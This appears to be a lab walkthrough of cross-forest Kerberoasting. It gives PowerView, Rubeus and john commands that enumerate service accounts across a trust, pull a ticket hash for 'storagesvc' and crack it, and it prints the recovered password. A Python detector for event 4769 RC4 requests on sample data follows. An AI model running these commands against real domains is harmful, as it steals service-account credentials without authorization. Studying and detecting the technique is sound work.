In this walkthrough we will learn how to carry out a cross-forest Kerberoasting attack.

First, load PowerView:

. .\PowerView.ps1

Now let's find Kerberoastable users across the forest:

Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName} | select samaccountname,serviceprincipalname

Notice that the user storagesvc is Kerberoastable.

Now use Rubeus.exe to get a TGS for that user:

.\Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:crosskerberoast.txt

As observed, we got the hash of the user.

Now crack it with john:

.\john.exe ..\..\crosskerberoast.txt --wordlist=..\..\kerberoast\10k-worst-pass.txt

And we got the password:

username: storagesvc
password: Qwerty@123
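
On the defending side, the ticket request made above is recorded on the eu.local domain controller as Security event 4769. The following is an added example, not part of the original walkthrough: it filters such events for RC4-HMAC tickets (encryption type 0x17) issued for user-style service accounts and marks requests whose client belongs to another realm. The field names follow event 4769; the sample events, the CORP.EXAMPLE realm, the heuristic and the function names are assumptions made for illustration.

```python
# Added example: flag Kerberoast-style service ticket requests in event 4769 data.
# Every event below is constructed sample data, not taken from a real log.
RC4_HMAC = "0x17"          # TicketEncryptionType value for RC4-HMAC
LOCAL_REALM = "EU.LOCAL"   # assumption: realm of the DC that logged the events


def ev(user, service, etype, status="0x0"):
    """Build a constructed event using the 4769 field names."""
    return {"TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status}


EVENTS = [
    ev("alice@EU.LOCAL", "FILESRV01$", "0x12"),            # machine account, AES
    ev("student1@CORP.EXAMPLE", "storagesvc", "0x17"),     # foreign realm, RC4
    ev("bob@EU.LOCAL", "krbtgt", "0x12"),                  # TGT renewal noise
    ev("carol@CORP.EXAMPLE", "WEB01$", "0x12"),            # foreign realm, AES
    ev("dave@EU.LOCAL", "sqlsvc", "0x17"),                 # same realm, RC4
    ev("erin@CORP.EXAMPLE", "backupsvc", "0x17", "0x1b"),  # failed request
]


def client_realm(event):
    """Return the upper-cased realm part of 'user@REALM', or '' if absent."""
    _, sep, realm = event["TargetUserName"].rpartition("@")
    return realm.upper() if sep else ""


def is_user_service(name):
    """Machine accounts end in '$'; krbtgt is the ticket-granting service."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def flag_roast_candidates(events, local_realm=LOCAL_REALM):
    """Return successful RC4 ticket requests for user service accounts."""
    findings = []
    for e in events:
        if e["Status"].lower() != "0x0":
            continue  # ticket was not issued
        if e["TicketEncryptionType"].lower() != RC4_HMAC:
            continue  # AES tickets are not the weak case looked for here
        if not is_user_service(e["ServiceName"]):
            continue
        findings.append({"service": e["ServiceName"],
                         "client": e["TargetUserName"],
                         "cross_realm": client_realm(e) != local_realm.upper()})
    return findings


if __name__ == "__main__":
    for f in flag_roast_candidates(EVENTS):
        print(f)
```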